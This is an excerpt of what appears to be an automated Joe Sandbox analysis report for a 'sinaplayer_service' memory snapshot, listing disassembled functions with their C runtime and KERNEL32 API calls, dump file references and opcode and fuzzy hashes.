                                                                                                                                                                                                    • Instruction ID: 527bab2094766bf697f5130f65f71a9a39997e114014d26aeef4a7d4c3ea32ac
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 079afd3f20d9ec14950b0ba18bbf7f9503d9ee7fa80e94556a9cf48eb8bee2fa
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8331C431A0430AABFB029F65D884BBE7BB8EF85764F41811AF9394F191DB70C401DBA5
                                                                                                                                                                                                    Function 6D0FA19D Relevance: 15.1, APIs: 10, Instructions: 104COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • EncodePointer.KERNEL32(00000000), ref: 6D0FA1E1
                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 6D0FA217
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: EncodeErrorLastPointer
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 688273888-0
                                                                                                                                                                                                    • Opcode ID: 6fed846710af9c006aca39a263947543097b35c8c5cdd20410830ca32da491d9
                                                                                                                                                                                                    • Instruction ID: 3aebca15392e43d2b4af13bf9b77503e70448739b08ea97416e60c0d66d06450
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6fed846710af9c006aca39a263947543097b35c8c5cdd20410830ca32da491d9
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0531C071684286DFEB40DF6EE880B7A7BF5FB0A351B614125F914D7281D7B1D901CBA0
                                                                                                                                                                                                    Function 6D0EB522 Relevance: 15.1, APIs: 10, Instructions: 95COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ?wait@_Condition_variable@details@Concurrency@@QAEXAAVcritical_section@3@@Z.MSVCR120(?,E18D5491), ref: 6D0EB56A
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ?wait@_Concurrency@@Condition_variable@details@Vcritical_section@3@@
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3496979797-0
                                                                                                                                                                                                    • Opcode ID: 091e28be5c8e170bde929c0fed7280fb0ae51070d11adb90f6773be3af2c06d1
                                                                                                                                                                                                    • Instruction ID: 79f3b625094a5f8f457458eac70031bcc8babf94bfe42f68b5cf0161291b6ed6
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 091e28be5c8e170bde929c0fed7280fb0ae51070d11adb90f6773be3af2c06d1
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9E31A0712083019FE700DF68D880B5EBBE8BF957A8F00071EF5A597290DB759905CB52
                                                                                                                                                                                                    Function 6D09E123 Relevance: 15.1, APIs: 10, Instructions: 91COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno$_invalid_parameter_noinfo
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2819658684-0
                                                                                                                                                                                                    • Opcode ID: 5d93df13e084f0fdb2ec71af754b902c592493e2a3f44f9832ea4bbcab9f863a
                                                                                                                                                                                                    • Instruction ID: 16f3b7efd81e3eeab2646dd61d16790ea58c6a10d9df924a3fca6bd12f6a832b
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5d93df13e084f0fdb2ec71af754b902c592493e2a3f44f9832ea4bbcab9f863a
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 30218135A18206DEF7265FB4C84077E76A8EF56378F12525AEA248B2E0D73188409A72
                                                                                                                                                                                                    Function 6D0A07AF Relevance: 15.1, APIs: 10, Instructions: 71COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __p__iob.MSVCR120(6D0A0850,00000010), ref: 6D0A07D5
                                                                                                                                                                                                      • Part of subcall function 6D0942FC: _lock.MSVCR120(?,?,6D095810,00000000,005C7910,6D0958A0,00000010,6D09639E,6D0963D0,00000008), ref: 6D09430F
                                                                                                                                                                                                    • __p__iob.MSVCR120(6D0A0850,00000010), ref: 6D0A07EB
                                                                                                                                                                                                      • Part of subcall function 6D0A0477: _fileno.MSVCR120(?,?,?,6D0A07F9,-00000020,6D0A0850,00000010), ref: 6D0A047F
                                                                                                                                                                                                      • Part of subcall function 6D0A0477: _isatty.MSVCR120(00000000,?,?,?,6D0A07F9,-00000020,6D0A0850,00000010), ref: 6D0A0485
                                                                                                                                                                                                      • Part of subcall function 6D0A0477: __p__iob.MSVCR120(0000FFFF,?,?,6D0A07F9,-00000020,6D0A0850,00000010), ref: 6D0A0491
                                                                                                                                                                                                      • Part of subcall function 6D0A0477: __p__iob.MSVCR120(0000FFFF,?,?,6D0A07F9,-00000020,6D0A0850,00000010), ref: 6D0A04A1
                                                                                                                                                                                                    • __p__iob.MSVCR120(6D0A0850,00000010), ref: 6D0A080D
                                                                                                                                                                                                    • _fputwc_nolock.MSVCR120(-00000020,-00000020,6D0A0850,00000010), ref: 6D0A0817
                                                                                                                                                                                                    • __p__iob.MSVCR120(6D0A0850,00000010), ref: 6D0A0823
                                                                                                                                                                                                    • __ftbuf.LIBCMT ref: 6D0A082F
                                                                                                                                                                                                    • __p__iob.MSVCR120(6D0A0850,00000010), ref: 6D0A086C
                                                                                                                                                                                                    • _fputwc_nolock.MSVCR120(0000000A,-00000020,6D0A0850,00000010), ref: 6D0A0877
                                                                                                                                                                                                    • _errno.MSVCR120(6D0A0850,00000010), ref: 6D0D58B3
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(6D0A0850,00000010), ref: 6D0D58BE
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: __p__iob$_fputwc_nolock$__ftbuf_errno_fileno_invalid_parameter_noinfo_isatty_lock
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 120561791-0
                                                                                                                                                                                                    • Opcode ID: 1fb40c497e5385223a76a9e7cd539d26e674fd1eccc5efdf6301f59f905f91be
                                                                                                                                                                                                    • Instruction ID: d833a9a66ddca6d37a0fc150c0a80187dd4f058b0b33c48fb06d47454dfe45aa
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1fb40c497e5385223a76a9e7cd539d26e674fd1eccc5efdf6301f59f905f91be
                                                                                                                                                                                                    • Instruction Fuzzy Hash: D411C4B294C20A6AFB145BF69C417BD33E4EF19368F9A4019E550DF1C1DF398481662D
                                                                                                                                                                                                    Function 6D092273 Relevance: 15.1, APIs: 10, Instructions: 69memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • HeapReAlloc.KERNEL32(00000000,00000000,00000001,00000000,00000000,?,6D09FF84,?,00000001,00000000,00000000,?,6D0DF128,00000000,00000010), ref: 6D0922AA
                                                                                                                                                                                                    • malloc.MSVCR120(00000001,?,6D09FF84,?,00000001,00000000,00000000,?,6D0DF128,00000000,00000010,?,?,?,?,6D0ABE8C), ref: 6D09F47B
                                                                                                                                                                                                    • free.MSVCR120(00000000,00000000,?,6D09FF84,?,00000001,00000000,00000000,?,6D0DF128,00000000,00000010), ref: 6D0DDBCB
                                                                                                                                                                                                    • _callnewh.MSVCR120(00000001,?,6D09FF84,?,00000001,00000000,00000000,?,6D0DF128,00000000,00000010,?,?,?,?,6D0ABE8C), ref: 6D0DDBE7
                                                                                                                                                                                                    • _callnewh.MSVCR120(00000001,00000000,00000000,?,6D09FF84,?,00000001,00000000,00000000,?,6D0DF128,00000000,00000010), ref: 6D0DDBF8
                                                                                                                                                                                                    • _errno.MSVCR120(00000000,00000000,?,6D09FF84,?,00000001,00000000,00000000,?,6D0DF128,00000000,00000010), ref: 6D0DDBFE
                                                                                                                                                                                                    • _errno.MSVCR120(?,6D09FF84,?,00000001,00000000,00000000,?,6D0DF128,00000000,00000010,?,?,?,?,6D0ABE8C,?), ref: 6D0DDC10
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,6D09FF84,?,00000001,00000000,00000000,?,6D0DF128,00000000,00000010,?,?,?,?,6D0ABE8C,?), ref: 6D0DDC17
                                                                                                                                                                                                    • _errno.MSVCR120(?,6D09FF84,?,00000001,00000000,00000000,?,6D0DF128,00000000,00000010,?,?,?,?,6D0ABE8C,?), ref: 6D0DDC28
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,6D09FF84,?,00000001,00000000,00000000,?,6D0DF128,00000000,00000010,?,?,?,?,6D0ABE8C,?), ref: 6D0DDC2F
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno$ErrorLast_callnewh$AllocHeapfreemalloc
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2627451454-0
                                                                                                                                                                                                    • Opcode ID: fbba1dfa1ff98aa79f7c5fb0e4cbd97352a5b764dfb7f45dace0990604c9e3f7
                                                                                                                                                                                                    • Instruction ID: 049f7e66b5fca7ef33a19f194e79a54c4d81403f86e814a6f5a6e07d8ee048b7
                                                                                                                                                                                                    • Opcode Fuzzy Hash: fbba1dfa1ff98aa79f7c5fb0e4cbd97352a5b764dfb7f45dace0990604c9e3f7
                                                                                                                                                                                                    • Instruction Fuzzy Hash: C6112336549323EBFB211FB8A80076D37A8BF16369F519926F9049F190DB74C440AAB0
                                                                                                                                                                                                    Function 6D096F4B Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 74COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 6D08F764: _getptd.MSVCR120(00000001,00000000,?,6D0AE01F,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?), ref: 6D08F77A
                                                                                                                                                                                                    • __crtCompareStringA.MSVCR120(?,?,00001001,005C2D90,?,?,?,00000000,00000000,?,7FFFFFFF,00000000,?, *\,005C2D90,005C2A20), ref: 6D096FAF
                                                                                                                                                                                                    • _strnicmp_l.MSVCR120(005C2D90,?,?,?,00000000,?,7FFFFFFF,00000000,?, *\,005C2D90,005C2A20,00000000,005C2D90,00000000,00000000), ref: 6D0AE3F6
                                                                                                                                                                                                    • _errno.MSVCR120(00000000,?,7FFFFFFF,00000000,?, *\,005C2D90,005C2A20,00000000,005C2D90,00000000,00000000,00000000), ref: 6D0DAB98
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(00000000,?,7FFFFFFF,00000000,?, *\,005C2D90,005C2A20,00000000,005C2D90,00000000,00000000,00000000), ref: 6D0DABA3
                                                                                                                                                                                                    • _errno.MSVCR120(00000000,?,7FFFFFFF,00000000,?, *\,005C2D90,005C2A20,00000000,005C2D90,00000000,00000000,00000000), ref: 6D0DABB2
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(00000000,?,7FFFFFFF,00000000,?, *\,005C2D90,005C2A20,00000000,005C2D90,00000000,00000000,00000000), ref: 6D0DABBD
                                                                                                                                                                                                    • _errno.MSVCR120(?,?,?,?,00000000,?,7FFFFFFF,00000000,?, *\,005C2D90,005C2A20,00000000,005C2D90,00000000,00000000), ref: 6D0DABC7
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno$_invalid_parameter_noinfo$CompareString__crt_getptd_strnicmp_l
                                                                                                                                                                                                    • String ID: *\
                                                                                                                                                                                                    • API String ID: 535387727-3401207301
                                                                                                                                                                                                    • Opcode ID: 8343183528071228cd948c9da2a8cc03f2dbce6e916447550be9f97a05173cab
                                                                                                                                                                                                    • Instruction ID: 114bb89427e8ff25371e93d4df30a22887cdab88dad76252d2458826ca0e7e97
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8343183528071228cd948c9da2a8cc03f2dbce6e916447550be9f97a05173cab
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1F21A471B0421AABFB01DEA5CC40BBFB76CFF51365F514659AA205B190DB319C019BF1
                                                                                                                                                                                                    Function 6D094DF1 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 62COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _get_osfhandle.MSVCR120(?,?,?,?,6D094F10,?,6D094F30,00000010), ref: 6D094DFA
                                                                                                                                                                                                    • _get_osfhandle.MSVCR120(?), ref: 6D094E1D
                                                                                                                                                                                                      • Part of subcall function 6D094D4B: __doserrno.MSVCR120(?,6D097FEE,00000000,00000000,00000000,00000000,00000000,?,6D0DE899,00000000,00000000,00000000,00000002,00000000,00000000,00000000), ref: 6D094D84
                                                                                                                                                                                                      • Part of subcall function 6D094D4B: _errno.MSVCR120(?,6D097FEE,00000000,00000000,00000000,00000000,00000000,?,6D0DE899,00000000,00000000,00000000,00000002,00000000,00000000,00000000), ref: 6D0DEFE6
                                                                                                                                                                                                      • Part of subcall function 6D094D4B: _invalid_parameter_noinfo.MSVCR120(?,6D097FEE,00000000,00000000,00000000,00000000,00000000,?,6D0DE899,00000000,00000000,00000000,00000002,00000000,00000000,00000000), ref: 6D0DEFF1
                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 6D094E24
                                                                                                                                                                                                    • _get_osfhandle.MSVCR120(00000002), ref: 6D0B2A17
                                                                                                                                                                                                    • _get_osfhandle.MSVCR120(00000001,00000002), ref: 6D0B2A20
                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 6D0DE211
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _get_osfhandle$CloseErrorHandleLast__doserrno_errno_invalid_parameter_noinfo
                                                                                                                                                                                                    • String ID: l\
                                                                                                                                                                                                    • API String ID: 1012986785-1336192488
                                                                                                                                                                                                    • Opcode ID: f71d5e736a48ae5370941cdff41107abdf4cbc35e3aa8b83d29c94bd933e0e19
                                                                                                                                                                                                    • Instruction ID: 9bcb1f3ecfc0c7cf37dda96e31c218509f1fd67802d67709d9219a3f3155da12
                                                                                                                                                                                                    • Opcode Fuzzy Hash: f71d5e736a48ae5370941cdff41107abdf4cbc35e3aa8b83d29c94bd933e0e19
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4E11C93268E26037F73342B4685877E7B995B8BB78F02021DEA74CF1D1CB70C441A268
                                                                                                                                                                                                    Function 6D0AC784 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 53COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _malloc_crt.MSVCR120(?,00000000,?), ref: 6D0AC7A0
                                                                                                                                                                                                      • Part of subcall function 6D092226: malloc.MSVCR120(6D0FC0AD,6D163B90,6D163B90,?,?,6D0FC0AD,?,00000000,00000000,00000000,00000000,00000000,?,?,?), ref: 6D092237
                                                                                                                                                                                                    • std::exception::exception.LIBCMT(?,00000001,00000000), ref: 6D0D3A67
                                                                                                                                                                                                    • std::exception::exception.LIBCMT(?,00000000), ref: 6D0D3A88
                                                                                                                                                                                                    • _CxxThrowException.MSVCR120(6D0E176C,6D15CE18,?), ref: 6D0D3A9D
                                                                                                                                                                                                    • std::exception::exception.LIBCMT(?,00000001), ref: 6D0D3AB3
                                                                                                                                                                                                    • _CxxThrowException.MSVCR120(6D0E176C,6D15CE18,?), ref: 6D0D3AE9
                                                                                                                                                                                                    • free.MSVCR120(00000000), ref: 6D0D3AF0
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • _DebugMallocator<T>::allocate() - Integer overflow., xrefs: 6D0D3A7D
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: std::exception::exception$ExceptionThrow$_malloc_crtfreemalloc
                                                                                                                                                                                                    • String ID: _DebugMallocator<T>::allocate() - Integer overflow.
                                                                                                                                                                                                    • API String ID: 2405410681-3293063709
                                                                                                                                                                                                    • Opcode ID: 62e4a046d5ab03bfce451013d87608a9d1192242a90552bb2e64fcc21e11dcf8
                                                                                                                                                                                                    • Instruction ID: d6c48e48342f223972b347b27bc0529046c0296a9c091c48e9e9fdc555596491
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 62e4a046d5ab03bfce451013d87608a9d1192242a90552bb2e64fcc21e11dcf8
                                                                                                                                                                                                    • Instruction Fuzzy Hash: DE11A1B590820DBEFB00EFE5D885BDE7BBCAB14344F51C056E914AB142EB35D344CA92
                                                                                                                                                                                                    Function 6D09D8E9 Relevance: 13.9, APIs: 9, Instructions: 443COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _isleadbyte_lfree
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3852065960-0
                                                                                                                                                                                                    • Opcode ID: 827be8351d7c25cade2c88856417b0caff021acd99eff215ac73938781fb190c
                                                                                                                                                                                                    • Instruction ID: 229a56afabd464ca60f38198e23f0403c75e184eb98ba2b6ec8a2fa5e4aa9095
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 827be8351d7c25cade2c88856417b0caff021acd99eff215ac73938781fb190c
                                                                                                                                                                                                    • Instruction Fuzzy Hash: FDF1C5F1D8421A8FFB218B24CC807EDB7F4AB85314F5091E9E618AB281D7749AC5DF64
                                                                                                                                                                                                    Function 6D095C0C Relevance: 13.7, APIs: 9, Instructions: 232stringCOMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _get_daylight.MSVCR120(?,-FFFFF894,00000006,?,6D095BD6,00000000,6D095BF0,0000000C,6D096173,?,00000000,?,0000003C,00000000,00000000), ref: 6D095C1A
                                                                                                                                                                                                    • __timezone.MSVCR120 ref: 6D0A8EE3
                                                                                                                                                                                                    • __daylight.MSVCR120 ref: 6D0A8EED
                                                                                                                                                                                                    • __dstbias.MSVCR120 ref: 6D0A8EF7
                                                                                                                                                                                                    • _invoke_watson.MSVCR120(00000000,00000000,00000000,00000000,00000000,-FFFFF894,00000006,?,6D095BD6,00000000,6D095BF0,0000000C,6D096173,?,00000000), ref: 6D0D668C
                                                                                                                                                                                                    • strcmp.MSVCR120(00000000,00000000,6D0A8F20,00000030,6D0A915C,6D095B70,00000008,6D096063,00000190,00000190,00000000,?,?), ref: 6D0D66A5
                                                                                                                                                                                                    • free.MSVCR120(00000000,6D0A8F20,00000030,6D0A915C,6D095B70,00000008,6D096063,00000190,00000190,00000000,?,?), ref: 6D0D66BA
                                                                                                                                                                                                    • strlen.MSVCR120(00000000,6D0A8F20,00000030,6D0A915C,6D095B70,00000008,6D096063,00000190,00000190,00000000,?,?), ref: 6D0D66C1
                                                                                                                                                                                                    • _malloc_crt.MSVCR120(00000001,00000000,6D0A8F20,00000030,6D0A915C,6D095B70,00000008,6D096063,00000190,00000190,00000000,?,?), ref: 6D0D66C8
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
